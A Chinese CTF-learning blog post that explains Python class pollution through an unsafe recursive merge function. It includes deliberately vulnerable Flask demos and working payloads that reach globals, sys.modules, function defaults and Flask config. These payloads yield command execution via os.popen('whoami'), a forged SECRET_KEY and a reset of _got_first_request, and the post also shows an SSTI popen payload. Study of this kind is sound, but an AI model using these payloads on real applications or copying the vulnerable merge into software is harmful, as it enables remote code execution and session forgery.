0x01 前言
baseCTF里面的那几道我都是现学现做,只是知道污染怎么操作,并不知道为啥可以污染,这次让我彻底弄懂它!
0x02 question
父子类的继承
概念
父类是被继承的类,也称为基类或超类。父类中的属性和方法会被子类继承。
子类是从父类继承而来的类,也称为派生类。子类可以拥有父类的所有属性和方法,还可以添加新的属性和方法,或者重写父类的方法。
同时还有几个重要方法,这里直接引用一位师傅所写的
- 在Python中,定义类是通过
class关键字,class后面紧接着是类名,紧接着是(object),表示该类是从哪个类继承下来的,所有类的本源都是object类 - 可以自由地给一个实例变量绑定属性,像js
- 由于类可以起到模板的作用,因此,可以在创建实例的时候,把一些我们认为必须绑定的属性强制填写进去。通过定义一个特殊的
__init__方法,在创建实例的时候,就把类内置的属性绑上 - 注意到
__init__方法的第一个参数永远是self,表示创建的实例本身,因此,在__init__方法内部,就可以把各种属性绑定到self,因为self就指向创建的实例本身。 - 当我们定义了一个类属性后,这个属性虽然归类所有,但类的所有实例都可以访问到
- 判断一个变量是否是某个类型可以用
isinstance()判断。
普通继承
在子类中,你可以使用 super() 函数来调用父类的方法。这在子类需要扩展而不是完全重写父类方法时特别有用。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
| class Animal:
def __init__(self, name):
self.name = name
def speak(self):
raise NotImplementedError("Subclass must implement this abstract method")
def eat(self):
print(f"{self.name} is eating.")
class Dog(Animal):
def __init__(self, name, breed):
super().__init__(name) # 调用父类的构造函数
self.breed = breed
def speak(self):
print(f"{self.name} says Woof!")
def fetch(self):
print(f"{self.name} is fetching the ball.")
class Cat(Animal):
def __init__(self, name, color):
super().__init__(name) # 调用父类的构造函数
self.color = color
def speak(self):
super().speak() # 调用父类的 speak 方法
print(f"{self.name} says Meow!")
def scratch(self):
print(f"{self.name} is scratching the furniture.")
instance = Cat("无情","black")
print(instance.name)
|
看看就行感觉没啥好讲的,看就能看懂
多重继承
一个子类可以继承多个父类
1
2
3
4
5
6
7
8
9
10
11
| class Flyer:
def fly(self):
print(f"{self.name} is flying.")
class Bird(Animal, Flyer):
def __init__(self, name, species):
super().__init__(name) # 调用父类的构造函数
self.species = species
def speak(self):
print(f"{self.name} chirps.")
|
方法的解析顺序我们靠mro()来查看
1
2
| print(Bird.mro())
# [<class '__main__.Bird'>, <class '__main__.Animal'>, <class '__main__.Flyer'>, <class 'object'>]
|
计算规则是这样
- 子类优先于父类:子类的方法和属性优先于父类的方法和属性。
- 父类的顺序:如果一个类有多个父类,那么这些父类的顺序会保持不变。
- 唯一性:MRO 列表中的每个类只出现一次。
但是这个实际的作用我还不知道是有啥,可能是效率问题?
污染过程解析
先看个最简单的demo
1
2
3
4
5
6
7
| class test():
pass
a=test()
a.__class__='polluted'
print(a.__class__)
|
这里直接污染发现报错了
1
| TypeError: __class__ must be set to a class, not 'str' object
|
那么此时我们如果要污染属性的话就去寻找其内置属性即可,__qualname__是用于访问类的名称
1
2
3
4
5
6
7
8
| class test():
pass
a=test()
print(a.__class__)
a.__class__.__qualname__='polluted'
print(a.__class__)
|
而也就是说污染其实就是赋值,那么为了搞清楚原理,我们自己写段代码来调试就可以了
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
| class father:
secret="hello"
class son_a(father):
pass
class son_b(father):
pass
def merge(src,dst):
for k,v in src.items():
if hasattr(dst,'__getitem__'):
if dst.get(k) and type(v) == dict:
merge(v,dst.get(k))
else:
dst[k]=v
elif hasattr(dst,k) and type(v) == dict:
merge(v,getattr(dst,k))
else:
setattr(dst,k,v)
instance=son_b()
payload={
"__class__":{
"__base__":{
"secret":"world"
}
}
}
print(son_a.secret)
print(instance.secret)
merge(payload,instance)
print(son_a.secret)
print(instance.secret)
|
然后进行debug就可以懂了,这里我还是自己试一次,毕竟是初学者
但是我发现个问题,我使用VScode始终进入不了merge函数,那没办法,我就下载一个pycharm吧,不过先讲讲函数
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
| def merge(src,dst):
# 遍历字典中的所有键值对
for k,v in src.items():
# 检查dst是否为字典
if hasattr(dst,'__getitem__'):
# 如果存在键k并且v是一个字典
if dst.get(k) and type(v) == dict:
merge(v,dst.get(k))
else:
dst[k]=v
# 如果dst是一个对象并且有属性k
elif hasattr(dst,k) and type(v) == dict:
merge(v,getattr(dst,k))
else:
# 将v赋值给k
setattr(dst,k,v)
|
欧克那么下来我们开始调试,打断点在merge(payload,instance)处
可以看到我们的键为'__class__',值为{'__base__':{'secret':'world'}},下一步由于dst不为字典直接到了elif
继续之后,发现键为'__base__',值为{'secret':'world'}
仍然是跳回到了这一步,继续看,再回来时,键为'secret',值为'world',现在的值已经不是字典了,所以直接跳转到了setattr,进行赋值
赋值之后还有一个东西,请看jpg
可以看到此时也是dst直接就指向地址了
那么我们就成功的通过当前类的__base__去污染了secret(现在这三个类的secret都是world),不过这仅仅只是一个内置属性,那能不能实现最大的利用直接污染object呢
前面几步都在正常进行,可是到了后面,发现个问题,也就是我们刚才所有的回退那两步发现没了,从而直接报错,也就是说污染失败,得出结论
object的属性不能污染
不过那回退那三步,又是怎么回事呢,我们再写一个多层的来试试,
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
| class father:
secret = "hello"
nested = {
"level1": {
"level2": {
"level3": "initial_value"
}
}
}
class son_a(father):
pass
class son_b(father):
pass
def merge(src, dst):
for k, v in src.items():
if hasattr(dst, '__getitem__'):
if dst.get(k) and type(v) == dict:
merge(v, dst.get(k))
else:
dst[k] = v
elif hasattr(dst, k) and type(v) == dict:
merge(v, getattr(dst, k))
else:
setattr(dst, k, v)
instance = son_b()
payload = {
"__class__": {
"__base__": {
"secret": "world",
"nested": {
"level1": {
"level2": {
"level3": "updated_value",
"new_level4": "new_value"
},
"new_level5": "new_value"
}
}
}
}
}
print(son_a.secret)
print(instance.secret)
print(instance.nested)
merge(payload, instance)
print(son_a.secret)
print(instance.secret)
print(instance.nested)
|
换成这个代码进行debug发现会在原地跳伍次
找规律都找的出来了吧,就是因为我们的payload深度所导致的,查找payload深度的方法
这样子debug,看看什么时候会完全的往外跳,记录下跳的次数即为payload深度
不过这样的话又要牵扯到python的循环了,那么查找官方文档,其中我们知道
循环是进行迭代调用的,从一个最简单的demo
1
2
3
4
| num=[1,2,3,4,5]
for i in num:
print(i)
|
这里进行调试会发现,每次进入之后跳出循环都会在for i in num:跳一下
那么回到我们的test
1
2
3
4
5
6
7
8
9
10
11
| def merge(src, dst):
for k, v in src.items():
if hasattr(dst, '__getitem__'):
if dst.get(k) and type(v) == dict:
merge(v, dst.get(k))
else:
dst[k] = v
elif hasattr(dst, k) and type(v) == dict:
merge(v, getattr(dst, k))
else:
setattr(dst, k, v)
|
这里第一次通过elif进入merge函数,第二次也是,总共合起来就是三次循环,所以跳出时,也是需要原地跳三次才可跳出
那么再看一个最简单的demo吧
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
| from flask import Flask, request, jsonify
import os
app = Flask(__name__)
def merge(src, dst):
for k, v in src.items():
if hasattr(dst, '__getitem__'):
if dst.get(k) and isinstance(v, dict):
merge(v, dst.get(k))
else:
dst[k] = v
elif hasattr(dst, k) and isinstance(v, dict):
merge(getattr(dst, k), v)
else:
setattr(dst, k, v)
class Demo:
def __init__(self, cmd):
self.cmd = cmd
def execute(self):
return os.popen(self.cmd).read()
@app.route('/merge_and_execute', methods=['POST'])
def merge_and_execute():
data = request.json
if not data or 'cmd' not in data:
return jsonify({"error": "Invalid input"}), 400
cmd_data = data['cmd']
a = Demo('echo Hello')
merge(cmd_data, a)
result = a.execute()
return jsonify({"result": result})
if __name__ == '__main__':
app.run(host='127.0.0.1',debug=True)
|
直接污染cmd就可以RCE了
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
| POST /merge_and_execute HTTP/1.1
Host: 127.0.0.1:5000
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
sec-ch-ua: "Google Chrome";v="129", "Not=A?Brand";v="8", "Chromium";v="129"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
sec-fetch-site: none
sec-fetch-mode: navigate
sec-fetch-user: ?1
sec-fetch-dest: document
Connection: close
Content-Length: 24
Content-Type: application/json
{"cmd":{"cmd":"whoami"}}
|
属性污染以及寻找
这里就神似SSTI中我们如何寻找可利用的方法了
原型链
如上面的,通过继承关系写出poc即可,当然与此同时,并不只是我们自定义的属性可以污染,还有内置属性也可以,这里可以以这个属性为例子
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
| class father:
secret = "hello"
class son_a(father):
pass
class son_b(father):
pass
def merge(src, dst):
for k, v in src.items():
if hasattr(dst, '__getitem__'):
if dst.get(k) and type(v) == dict:
merge(v, dst.get(k))
else:
dst[k] = v
elif hasattr(dst, k) and type(v) == dict:
merge(v, getattr(dst, k))
else:
setattr(dst, k, v)
instance = son_b()
payload = {
"__class__": {
"__base__": {
"secret": "world",
"__str__":"polluted!"
}
}
}
print(father.__str__)
merge(payload,instance)
print(father.__str__)
|
成功污染,好玩好玩
非继承
globals
我们在flask中进行SSTI注入的时候一般就会先去寻找globals,这里也是一样,我们直接去找就行了,不过注意的一点就是,如果我们不进行重写__init__的话,是找不到的
未重写
1
2
3
4
5
6
7
8
9
10
11
12
| class MyClass:
pass
print(type(MyClass.__init__))
try:
print(MyClass.__init__.__globals__)
# 访问不存在的属性会抛出AttributeError
except AttributeError as e:
print(e)
# <class 'wrapper_descriptor'>
# 'wrapper_descriptor' object has no attribute '__globals__'
|
重写过后
1
2
3
4
5
6
7
8
| class MyClass:
def __init__(self):
self.x = 10
print(type(MyClass.__init__))
print(MyClass.__init__.__globals__)
# <class 'function'>
# {'__name__': '__main__', '__doc__': None, '__package__': None, '__loader__': <_frozen_importlib_external.SourceFileLoader object at 0x000001BDD0B71700>, '__spec__': None, '__annotations__': {}, '__builtins__': <module 'builtins' (built-in)>, '__file__': 'D:\\PyCharm 2023.3.2\\object\\pythonProject\\test.py', '__cached__': None, 'MyClass': <class '__main__.MyClass'>}
|
同时这里我们也发现,当其未被重写时,它的类型是 wrapper_descriptor,没有__globals__,被重写会变为function,有__globals__,请看demo
1
2
3
4
5
6
7
| def demo():
pass
class MyClass:
def __init__(self):
pass
print(demo.__globals__ == globals() == MyClass.__init__.__globals__)
|
说了这么多别给你说迷糊了,我们的目的就是得到__globals__,OK那么继续看
从SSTI的角度(flask)
1
| {{cycler.__init__.__globals__.__builtins__['__import__']('os').popen('whoami').read()}}
|
那么我们进入cycler源码
1
2
3
4
5
6
7
8
9
10
11
12
13
14
| class Cycler(MutableSequence):
def __init__(self, **kwargs):
self._keys = []
self._length = 1
self._by_key = {}
for key, val in kwargs.items():
if not hasattr(val, '__getitem__') or not hasattr(val, '__len__'):
raise TypeError(f"{key!r} does not support indexing/length")
self._keys.append(key)
self._by_key[key] = val
self._length = lcm(self._length, len(val))
self._index = 0
# 其他方法省略...
|
很明显看到__init__是被重写了的,其他的不放了(太长了)
那么我们为啥要找这个东西,这再说说
{{ cycler.__init__.__globals__ }} 会返回 cycler 模块中 Cycler 类的 __init__ 方法的全局命名空间。这个全局命名空间是一个字典,字典的内容如下
- 内置函数和模块:如
__builtins__。 - 导入的模块:如
math(如果 cycler 模块导入了 math 模块)。 - 定义的类和函数:如
Cycler 类本身,以及其他在 cycler 模块中定义的类和函数。 - 其他全局变量:如
cycler 模块中定义的其他变量。
理清楚了,来看demo,直接利用__globals__污染属性和类属性
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
| name="baozongwi"
class son_a():
secret="nonono"
class son_b():
def __init__(self):
pass
pass
def merge(src,dst):
# 遍历字典中的所有键值对
for k,v in src.items():
# 检查dst是否为字典
if hasattr(dst,'__getitem__'):
# 如果存在键k并且v是一个字典
if dst.get(k) and type(v) == dict:
merge(v,dst.get(k))
else:
dst[k]=v
# 如果dst是一个对象并且有属性k
elif hasattr(dst,k) and type(v) == dict:
merge(v,getattr(dst,k))
else:
# 将v赋值给k
setattr(dst,k,v)
a=son_a()
b=son_b()
payload={
"__init__":{
"__globals__":{
"name":"12SqweR",
"a":{
"secret":"good!!!"
}
}
}
}
print(name)
print(a.secret)
merge(payload,b)
print(name)
print(a.secret)
|
这里我们就成功污染了,但是实际情况中,常常是存在于内置模块或者是第三方模块之中,此时我们就不太好找关系了。不过还是有很多办法的
sys
那么就要使用sys,因为sys模块的modules属性以字典的形式包含了程序自开始运行时所有已加载过的模块,可以直接从该属性中获取到目标模块,并随着模块的导入而动态更新。
test.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
| import sys
import son
class son_a():
secret="nonono"
class son_b():
def __init__(self):
pass
pass
def merge(src,dst):
# 遍历字典中的所有键值对
for k,v in src.items():
# 检查dst是否为字典
if hasattr(dst,'__getitem__'):
# 如果存在键k并且v是一个字典
if dst.get(k) and type(v) == dict:
merge(v,dst.get(k))
else:
dst[k]=v
# 如果dst是一个对象并且有属性k
elif hasattr(dst,k) and type(v) == dict:
merge(v,getattr(dst,k))
else:
# 将v赋值给k
setattr(dst,k,v)
payload={
"__init__":{
"__globals__":{
"sys":{
"modules":{
"son":{
"son_test":{
"secret":"good!!!"
}
}
}
}
}
}
}
b=son_b()
print(son.son_test.secret)
merge(payload,b)
print(son.son_test.secret)
|
son.py
1
2
| class son_test:
secret="nonono"
|
这里就以导入第三方块示例了
Loader加载器
__loader__ 是一个属性,它存在于每个已导入的模块对象中。这个属性指向一个加载器对象,该对象负责加载该模块。在一些场景中常常伴有着importlib模块的使用,那么这个时候我们就可以使用loader加载器来进行sys模块的加载从而达到目的
加载器这个东西可以简单看看
BuiltinImporter:
1
2
3
| import math
print(math.__loader__)
# <class '_frozen_importlib.BuiltinImporter'>
|
SourceFileLoader:
1
2
3
| import son # 自定义模块才行
print(son.__loader__)
# <_frozen_importlib_external.SourceFileLoader object at 0x0000020819FA10D0>
|
ExtensionFileLoader:
1
2
3
| import numpy
print(numpy.__loader__)
# <_frozen_importlib_external.SourceFileLoader object at 0x000001C8DC2710D0>
|
只要是BuiltinImporter的加载器都行,所以这里还有spec也能用
那么来看demo吧
son.py
1
2
| class son_test():
secret="nonono"
|
test.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
| import importlib
import son
class son_a():
secret="nonono"
class son_b():
def __init__(self):
pass
pass
def merge(src,dst):
# 遍历字典中的所有键值对
for k,v in src.items():
# 检查dst是否为字典
if hasattr(dst,'__getitem__'):
# 如果存在键k并且v是一个字典
if dst.get(k) and type(v) == dict:
merge(v,dst.get(k))
else:
dst[k]=v
# 如果dst是一个对象并且有属性k
elif hasattr(dst,k) and type(v) == dict:
merge(v,getattr(dst,k))
else:
# 将v赋值给k
setattr(dst,k,v)
print("sys" in dir(__import__("importlib")))
payload={
"__init__":{
"__globals__":{
"importlib":{
"__loader__":{
"__init__":{
"__globals__":{
"sys":{
"modules":{
"son":{
"son_test":{
"secret":"good"
}
}
}
}
}
}
}
}
}
}
}
b=son_b()
print(son.son_test.secret)
merge(payload,b)
print(son.son_test.secret)
|
然后__spec__
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
| import math
import son
class son_a():
secret="nonono"
class son_b():
def __init__(self):
pass
pass
def merge(src,dst):
# 遍历字典中的所有键值对
for k,v in src.items():
# 检查dst是否为字典
if hasattr(dst,'__getitem__'):
# 如果存在键k并且v是一个字典
if dst.get(k) and type(v) == dict:
merge(v,dst.get(k))
else:
dst[k]=v
# 如果dst是一个对象并且有属性k
elif hasattr(dst,k) and type(v) == dict:
merge(v,getattr(dst,k))
else:
# 将v赋值给k
setattr(dst,k,v)
payload={
"__init__":{
"__globals__":{
"math":{
"__spec__":{
"__init__":{
"__globals__":{
"sys":{
"modules":{
"son":{
"son_test":{
"secret":"good"
}
}
}
}
}
}
}
}
}
}
}
b=son_b()
print(son.son_test.secret)
merge(payload,b)
print(son.son_test.secret)
|
大家比照一下,很明显__spec__限制更少,我在实验的时候用math的loader来加载sys,结果弄半天后面一直不成功,于是看看有没有结果false
1
| print("sys" in dir(__import__("math")))
|
函数形参默认值替换
__defaults__是一个元组,用于存储函数或方法的默认参数值。当我们去定义一个函数时,可以为其中的参数指定默认值。这些默认值会被存储在__defaults__元组中。我们可以通过这个属性来污染参数默认值
1
2
3
4
5
| def a(x,y=2,z=3):
pass
print(a.__defaults__)
# (2,3)
|
这是一个函数,有三个参数,其中一个必填参数(x),还有两个是可选参数(y,z),再多看看,把__default__看懂
1
2
3
4
5
| def func_b(var_1, var_2):
pass
print(func_b.__defaults__)
# None
|
那么再来看个特殊的
/ 之前的参数:- 这些参数是 位置参数(positional-only parameters)。
- 它们只能通过位置传递,不能通过关键字传递。
/ 和 * 之间的参数:- 这些参数既可以是 位置参数,也可以是 关键字参数。
- 它们可以通过位置或关键字传递。
* 之后的参数:- 这些参数是 关键字参数(keyword-only parameters)。
- 它们只能通过关键字传递,不能通过位置传递。
- 有默认值但是不计入
__defualts__
1
2
3
4
5
| def a(x,/,y=2,*,z=3):
pass
a(x=1)
# TypeError: a() got some positional-only arguments passed as keyword arguments: 'x'
|
1
2
3
4
5
| def a(x,/,y=2,*,z=3):
pass
a(1,4,6)
# TypeError: a() takes from 1 to 2 positional arguments but 3 were given
|
1
2
3
4
5
6
| def a(x,/,y=2,*,z=3):
print(x,y,z)
pass
a(1,4,z=6)
print(a.__defaults__)
|
欧克懂了之后来污染吧
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
| def demo(x,name="baozongwi",age="99"):
if name != "12SqweR":
print(x)
else :
if age != "99":
print(__import__("os").popen(x).read())
class A:
def __init__(self):
pass
def merge(src,dst):
# 遍历字典中的所有键值对
for k,v in src.items():
# 检查dst是否为字典
if hasattr(dst,'__getitem__'):
# 如果存在键k并且v是一个字典
if dst.get(k) and type(v) == dict:
merge(v,dst.get(k))
else:
dst[k]=v
# 如果dst是一个对象并且有属性k
elif hasattr(dst,k) and type(v) == dict:
merge(v,getattr(dst,k))
else:
# 将v赋值给k
setattr(dst,k,v)
a=A()
b=demo
payload={
"__init__":{
"__globals__":{
"demo":{
"__defaults__":
("12SqweR","100")
}
}
}
}
print(b.__defaults__)
merge(payload,a)
print(b.__defaults__)
c=demo("whoami")
|
这个__defaults__的写法一定要对,是元组,不然就失败,当然如果是True或者False的话,就可以直接写
这里给看看我的错误写法,
首先我加了大括号,不是元组,然后modules里面还只有模块,所以直接鸭溪啦
后来我查看一些污染类文章发现用sys一样可以
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
| import sys
def demo(x, name="baozongwi", age="99"):
if name != "12SqweR":
print(x)
else:
if age != "99":
print(__import__("os").popen(x).read())
class A:
def __init__(self):
pass
def merge(src, dst):
for k, v in src.items():
if hasattr(dst, '__getitem__'):
if dst.get(k) and type(v) == dict:
merge(v, dst.get(k))
else:
dst[k] = v
elif hasattr(dst, k) and type(v) == dict:
merge(v, getattr(dst, k))
else:
setattr(dst, k, v)
a = A()
b = demo
payload = {
"__init__": {
"__globals__": {
"sys": {
"modules": {
"__main__": {
"demo": {
"__defaults__": ("12SqweR", "100")
}
}
}
}
}
}
}
print(b.__defaults__) # 输出: ('baozongwi', '99')
merge(payload, a)
print(b.__defaults__) # 输出: ('12SqweR', '100')
c = demo("whoami")
|
除了__defaults__还有__kwdefaults__,大差不差,只不过这个是字典,cancan
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
| def func_a(var_1, var_2 =2, var_3 = 3):
pass
def func_b(var_1, /, var_2 =2, var_3 = 3):
pass
def func_c(var_1, var_2 =2, *, var_3 = 3):
pass
def func_d(var_1, /, var_2 =2, *, var_3 = 3):
pass
print(func_a.__kwdefaults__)
#None
print(func_b.__kwdefaults__)
#None
print(func_c.__kwdefaults__)
#{'var_3': 3}
print(func_d.__kwdefaults__)
#{'var_3': 3}
|
发现只有关键字参数的默认值才会返回
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
| def demo(x,*,name="baozongwi",age="99"):
if name != "12SqweR":
print(x)
else :
if age != "99":
print(__import__("os").popen(x).read())
class A:
def __init__(self):
pass
def merge(src,dst):
# 遍历字典中的所有键值对
for k,v in src.items():
# 检查dst是否为字典
if hasattr(dst,'__getitem__'):
# 如果存在键k并且v是一个字典
if dst.get(k) and type(v) == dict:
merge(v,dst.get(k))
else:
dst[k]=v
# 如果dst是一个对象并且有属性k
elif hasattr(dst,k) and type(v) == dict:
merge(v,getattr(dst,k))
else:
# 将v赋值给k
setattr(dst,k,v)
a=A()
b=demo
payload={
"__init__":{
"__globals__":{
"demo":{
"__kwdefaults__": dict(name="12SqweR",age="100")
# "__kwdefaults__": {"name":"12SqweR","age":"100"}
}
}
}
}
print(b.__kwdefaults__)
merge(payload,a)
print(b.__kwdefaults__)
c=demo("whoami")
|
关键信息替换
session_key
有些时候当我们不知道key的时候,并且审计代码或者尝试,发现可以污染的时候,那我们可以直接污染为自己想要的可控值,那么此时session就可以任意伪造了
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
| from flask import Flask,request
import json
app = Flask(__name__)
app.config['SECRET_KEY']="who are you"
def merge(src, dst):
# Recursive merge function
for k, v in src.items():
if hasattr(dst, '__getitem__'):
if dst.get(k) and type(v) == dict:
merge(v, dst.get(k))
else:
dst[k] = v
elif hasattr(dst, k) and type(v) == dict:
merge(v, getattr(dst, k))
else:
setattr(dst, k, v)
class cls():
def __init__(self):
pass
instance = cls()
@app.route('/',methods=['POST', 'GET'])
def index():
print(app.config['SECRET_KEY'])
if request.data:
merge(json.loads(request.data), instance)
return "[+]Config:%s"%(app.config['SECRET_KEY'])
app.run(host="0.0.0.0")
|
直接污染
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
| POST / HTTP/1.1
Host: 127.0.0.1:5000
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
sec-ch-ua: "Google Chrome";v="129", "Not=A?Brand";v="8", "Chromium";v="129"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
sec-fetch-site: none
sec-fetch-mode: navigate
sec-fetch-user: ?1
sec-fetch-dest: document
Connection: close
Content-Type: application/json
Content-Length: 189
{
"__init__":{
"__globals__":{
"app":{
"config":{
"SECRET_KEY":"mine"
}
}
}
}
}
|
_got_first_request
这里对版本有要求我们给自己降个级
1
2
3
4
5
| pip install werkzeug==2.0.3
pip install Flask==2.1.0
pip install --upgrade werkzeug
pip install --upgrade Flask
|
等会升级回来就好了
_got_first_request 是 Flask 应用内部的一个属性,用于跟踪是否已经处理了第一个请求。这个属性主要用于实现 before_first_request 装饰器的功能,但在 Flask 2.2.0 版本中,before_first_request 装饰器已经被移除,因此 _got_first_request 也失去了其主要用途。
就是场景就是有些时候为了安全,会只允许一些特定操作,比如必须在before_first_request 装饰器实现一些东西,看看这个装饰器的源码
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
| class Flask(WerkzeugApp):
# ... 其他代码 ...
def __init__(self, import_name, static_url_path=None, static_folder='static',
static_host=None, host_matching=False, subdomain_matching=False,
template_folder='templates', instance_path=None,
instance_relative_config=False, root_path=None):
# ... 初始化代码 ...
self.before_first_request_funcs = []
# ... 其他初始化代码 ...
def before_first_request(self, f):
"""Register a function to be run before the first request only."""
self.before_first_request_funcs.append(f)
return f
def _got_first_request(self):
if self._got_first_request:
return
self._got_first_request = True
for func in self.before_first_request_funcs:
func()
def process_response(self, response):
"""Can be overridden in order to modify the response object before it's sent to the client."""
# ... 其他代码 ...
self._got_first_request()
# ... 其他代码 ...
return response
def preprocess_request(self):
"""Called before the actual request dispatching and will ensure that
:meth:`before_request` functions and URL value matching are done. If
this returns a response the regular request handling is skipped and the
returned response is sent instead.
"""
# ... 其他代码 ...
self._got_first_request()
# ... 其他代码 ...
return None
|
主要就是这里
1
2
3
4
5
6
| def _got_first_request(self):
if self._got_first_request:
return
self._got_first_request = True
for func in self.before_first_request_funcs:
func()
|
也就是说我们如果要调用这个装饰器中的函数,必须让_got_first_request为false
这里我们如果可以污染的话就非常good
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
| from flask import Flask,request
import json
app = Flask(__name__)
def merge(src, dst):
# Recursive merge function
for k, v in src.items():
if hasattr(dst, '__getitem__'):
if dst.get(k) and type(v) == dict:
merge(v, dst.get(k))
else:
dst[k] = v
elif hasattr(dst, k) and type(v) == dict:
merge(v, getattr(dst, k))
else:
setattr(dst, k, v)
class cls():
def __init__(self):
pass
instance = cls()
flag = "Is flag here?"
@app.before_first_request
def init():
global flag
if hasattr(app, "special") and app.special == "U_Polluted_It":
flag = open("flag", "rt").read()
@app.route('/',methods=['POST', 'GET'])
def index():
if request.data:
merge(json.loads(request.data), instance)
global flag
setattr(app, "special", "U_Polluted_It")
return flag
app.run(host="0.0.0.0")
|
还要创建一个flag文件,自己随便来
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
| POST / HTTP/1.1
Host: 127.0.0.1:5000
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
sec-ch-ua: "Google Chrome";v="129", "Not=A?Brand";v="8", "Chromium";v="129"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
sec-fetch-site: none
sec-fetch-mode: navigate
sec-fetch-user: ?1
sec-fetch-dest: document
Connection: close
Content-Type: application/json
Content-Length: 145
{
"__init__":{
"__globals__":{
"app":{
"_got_first_request":false
}
}
}
}
|
这里还有一个点,就是因为版本问题false必须写成这样子,而不是False
_static_url_path
这个属性用于定义静态文件的目录,默认情况下,Flask 会从 static 文件夹中提供静态文件。所以我们只要污染这个属性就可以进行目录穿越
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
| class Flask(WerkzeugApp):
def __init__(self, import_name, static_url_path=None, static_folder='static',
static_host=None, host_matching=False, subdomain_matching=False,
template_folder='templates', instance_path=None,
instance_relative_config=False, root_path=None):
# ... 其他初始化代码 ...
if static_url_path is not None:
self._static_url_path = static_url_path
else:
self._static_url_path = '/static'
if static_folder is not None:
self.static_folder = static_folder
else:
self.static_folder = 'static'
# ... 其他初始化代码 ...
|
查了一下,_static_folder控制了实际静态文件所在位置,我们自己起环境试试
1
2
3
4
5
| <html>
<h1>hello</h1>
<body>
</body>
</html>
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
| from flask import Flask,request
import json
app = Flask(__name__)
def merge(src, dst):
# Recursive merge function
for k, v in src.items():
if hasattr(dst, '__getitem__'):
if dst.get(k) and type(v) == dict:
merge(v, dst.get(k))
else:
dst[k] = v
elif hasattr(dst, k) and type(v) == dict:
merge(v, getattr(dst, k))
else:
setattr(dst, k, v)
class cls():
def __init__(self):
pass
instance = cls()
@app.route('/',methods=['POST', 'GET'])
def index():
if request.data:
merge(json.loads(request.data), instance)
return "flag in ./flag but heres only static/index.html"
